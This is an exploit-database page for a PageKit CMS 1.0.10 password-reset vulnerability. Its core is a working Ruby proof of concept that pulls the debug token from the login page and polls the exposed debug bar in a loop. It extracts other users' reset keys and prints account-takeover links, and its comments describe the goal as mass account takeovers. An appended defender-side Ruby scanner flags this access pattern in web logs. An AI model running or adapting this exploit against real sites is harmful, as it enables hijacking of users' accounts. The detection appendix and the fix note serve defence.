0day.today - Biggest Exploit Database in the World.
PageKit 1.0.10 - Password Reset Exploit
# Exploit Title: Remote PageKit Password Reset Vulnerability
# Date: 21-01-2017
# Software Link: http://pagekit.com/
# Exploit Author: Saurabh Banawar from SecureLayer7
# Contact: http://twitter.com/securelayer7
# Website: https://securelayer7.net
# Category: webapps

1. Description

Any remote user can reset another account's password by reading the debug log. The exploit succeeds only if the debug option is enabled in the Pagekit CMS, because the debug bar exposes the password-reset links that the application generates.

CMS pentest report can be found here: https://securelayer7.net/download/pdf/SecureLayer7-Pentest-report-Pagekit-CMS.pdf

2. Proof of Concept

```ruby
require 'net/http'

# Enter the domain/IP address of the site for which you want to test this vulnerability
vulnerableSite = 'http://127.0.0.1'

loopCount = 0
while loopCount == 0
  # We request the login page, whose HTML source contains the debug token
  url = URI.parse(vulnerableSite + '/pagekit/index.php/user/login')
  request = Net::HTTP::Get.new(url)
  resp = Net::HTTP.start(url.host, url.port) { |http| http.request(request) }

  # The response body is split with regular expressions to extract the value of the _debug parameter
  bodyOfResponse = resp.body
  myArray1 = bodyOfResponse.split(/"current":"/)
  outputOfMyArray1 = myArray1[1]
  myArray2 = outputOfMyArray1.split(/"};/)
  theSecret = myArray2[0]
  puts ""
  puts "The secret token to debug link is: #{theSecret}"
  puts ""

  # Fetch the debug bar page, which lists the generated password-reset links
  url = URI.parse(vulnerableSite + '/pagekit/index.php/_debugbar/' + theSecret)
  request = Net::HTTP::Get.new(url)
  resp = Net::HTTP.start(url.host, url.port) { |http| http.request(request) }
  initial = resp.body

  # Count the victim users that appear in the debug output
  users = initial.scan(/user=.+?(?=")/)
  c = users.count
  e = c.to_i

  if c == 0
    # If the count is 0 we keep monitoring
    puts "Currently no user has clicked on reset password link."
    puts ""
    puts "Trying again..."
    puts ""
    puts ""
  else
    # If the count is greater than 0 we found a victim: build the password reset link and display it in the console
    link1 = vulnerableSite + "/pagekit/index.php/user/resetpassword/confirm?user="
    link2 = "&key="
    i = 0
    while i < e
      securityToken = ''
      a = users[i]
      b = a.split('=')
      c = b[1]
      d = c.split('\\')
      victimUserName = d[0]
      puts "The victim is: #{victimUserName}"
      f = b[2]
      securityToken = f.scan(/[^\\]/)
      securityTokenFiltered = securityToken.join
      puts "The security token of victim is: #{securityTokenFiltered}"
      puts "Link for account takeover"
      puts "#{link1}#{victimUserName}#{link2}#{securityTokenFiltered}"
      puts ""
      puts ""
      i += 1
    end
  end
  # This loop runs forever because we want to continuously monitor who is requesting a password reset
  # and who has clicked on the link, so that we can perform mass account takeovers
end
```

3. Solution: Update to version 1.0.11
https://github.com/pagekit/pagekit/releases/tag/1.0.11

# 0day.today [2024-11-16] #
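As an added defender-side example, not part of the original advisory: a small Ruby check that scans web-server access-log lines for the access pattern the proof of concept above produces, a client that fetched the exposed `/_debugbar/` page and then used a `resetpassword/confirm` link shortly afterwards. The combined log format, the time window and the sample lines are assumptions, and the log lines are constructed.

```ruby
require 'time'

# Assumption: standard nginx/Apache combined log format.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3})/

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    path: m[:path], status: m[:status].to_i }
end

# Flags clients that successfully read the debug bar (which leaks reset links)
# and then hit a reset-confirm URL for some user within +window+ seconds.
# A legitimate user clicking the link from their mailbox never reads the
# debug bar first, so that client is not flagged.
def flag_debugbar_abuse(lines, window: 3600)
  events = lines.map { |l| parse_line(l) }.compact
  debug_hits = Hash.new { |h, k| h[k] = [] }
  events.each do |e|
    debug_hits[e[:ip]] << e[:time] if e[:path].include?('/_debugbar/') && e[:status] == 200
  end
  findings = []
  events.each do |e|
    next unless e[:path] =~ %r{/user/resetpassword/confirm\?user=([^&]+)}
    victim = Regexp.last_match(1)
    prior = debug_hits[e[:ip]].any? { |t| t <= e[:time] && e[:time] - t <= window }
    findings << { ip: e[:ip], victim: victim } if prior
  end
  findings.uniq
end

# Constructed sample log: 203.0.113.9 reads the debug bar and then uses
# alice's reset link; 198.51.100.4 is alice herself clicking her own link.
SAMPLE_LOG = [
  '203.0.113.9 - - [21/Jan/2017:10:00:01 +0000] "GET /pagekit/index.php/user/login HTTP/1.1" 200 5120',
  '203.0.113.9 - - [21/Jan/2017:10:00:05 +0000] "GET /pagekit/index.php/_debugbar/abc123 HTTP/1.1" 200 8192',
  '198.51.100.4 - - [21/Jan/2017:10:01:00 +0000] "GET /pagekit/index.php/user/resetpassword/confirm?user=alice&key=k1 HTTP/1.1" 200 900',
  '203.0.113.9 - - [21/Jan/2017:10:02:10 +0000] "GET /pagekit/index.php/user/resetpassword/confirm?user=alice&key=k1 HTTP/1.1" 200 900'
]

if __FILE__ == $PROGRAM_NAME
  flag_debugbar_abuse(SAMPLE_LOG).each { |f| puts "ALERT #{f[:ip]} used reset link for #{f[:victim]} after reading /_debugbar/" }
end
```

Any request to `/_debugbar/` from a non-developer address is itself worth alerting on, since it means debug mode is enabled on a reachable instance.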